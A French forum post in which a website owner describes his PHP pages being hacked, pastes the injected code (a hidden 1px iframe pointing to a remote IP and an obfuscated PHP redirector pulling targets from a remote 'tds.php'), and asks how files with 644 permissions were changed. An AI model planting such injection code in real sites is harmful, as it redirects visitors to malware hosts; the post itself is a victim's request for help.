"Page malveillante"

Bonjour,

Mon site est hébergé sur un serveur sur lequel j'ai un accès complet.
J'ai subi deux problèmes :

1)
Lors de l'affichage d'une page (en fait, les pages index.php qui se touvent dans les différents répertoires), j'ai eu une alerte "Page malveillante" bla bla bla... (alerte envoyée par Google).
Après avoir accédé au serveur par SSH, je constate que le contenu des pages index.php avait effectivement été modifié et les deux lignes suivantes avaient été rajoutées dans chacune d'elles :

<!-- . --><iframe width="1px" height="1px" src="http://5.45.179.41/transport/replys-terribly-reading_works.php" style="display:block;"></iframe>
<!-- . -->

Cela est arrivé plusieurs fois et l'URL indiquée dans l'iframe n'a pas toujours été la même.
(NB: A mon avis, mieux vaut ne pas cliquer sur le lien ci-dessus affiché)

2)
Une précédente fois, les 83 pages du site avaient toutes été modifiées. Elles avaient gardé leur nom mais tous les contenus étaient les mêmes. Voir ci-dessous :

<?php
ini_set('display_errors',0);if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir(){if(!empty($_ENV['TMP'])){return realpath($_ENV['TMP']);}if(!empty($_ENV['TMPDIR'])){return realpath($_ENV['TMPDIR']);}if(!empty($_ENV['TEMP'])){return realpath($_ENV['TEMP']);}$tempfile=tempnam(__FILE__,'');if(file_exists($tempfile)){unlink($tempfile);return realpath(dirname($tempfile));}return null;}}$geturl='http://188.190.124.81/tds.php';$timeout=180;$default_url='http://www.google.com/robots.txt';if(!$geturl)exit();$base=ini_get('upload_tmp_dir');if($base==null)$base=sys_get_temp_dir();$tmp_settings=$base."/settings.json";$settings=file_exists($tmp_settings)?unserialize(file_get_contents($tmp_settings)):array('last'=>0,'url'=>$default_url);if($settings['last']<time()-$timeout){if($settings['url']=file_get_contents($geturl)){$settings['last']=time();$fp=fopen($tmp_settings,'w');flock($fp,LOCK_EX);fputs($fp,serialize($settings));flock($fp,LOCK_UN);fclose($fp);}}$url=$settings['url']?$settings['url']:file_get_contents($geturl);if(substr($url,0,4)!='http')$url="http://".$url."/";header("Location: $url");exit();?>

Ma question est la suivante : sachant que les droits sur ces fichiers sont -rw-r--r-- (chmod 644), que le propriétaire du fichier a les droits RW, que l'utilisateur (visiteur des pages web) n'a que le droit R, comment a-t-on pu modifier ces fichiers qui constituent les pages web ???

J'ai prévenu l'hébergeur et j'attends sa réponse. Mais que puis-je faire ? En va-t-il de la responsabilité de l'hébergeur qui doit assurer la sécurité de l'hébergement ou n'est-ce que la responsabilité de celui qui publie ? Et surtout, que puis-je faire pour éviter que cela se reproduise ?

Google propose des "outils pour webmasters". J'ai essayé pour voir. En fait, il propose le téléchargement d'un fichier que l'on doit déposer sur son site. Ensuite, avec un navigateur, il faut afficher cette page. Le résultat : Google va fouiller TOUT LE SITE "pour vérifier" s'il y a des logiciels malveillants. En fait, la page proposée par Google n'est qu'un lien vers une page dont on ne connait pas le contenu et on ne sait pas ce que fera cette page d'autant plus qu'on lui aura accordé des droits et qu'on sait que Google est un très grand curieux.

Que puis-je faire pour me protéger et empêcher qu'on modifie mes pages web mais sans ouvrir en grand les portes à Google pour sa collecte d'information bien connue ?

Merci beaucoup pour vos réponses.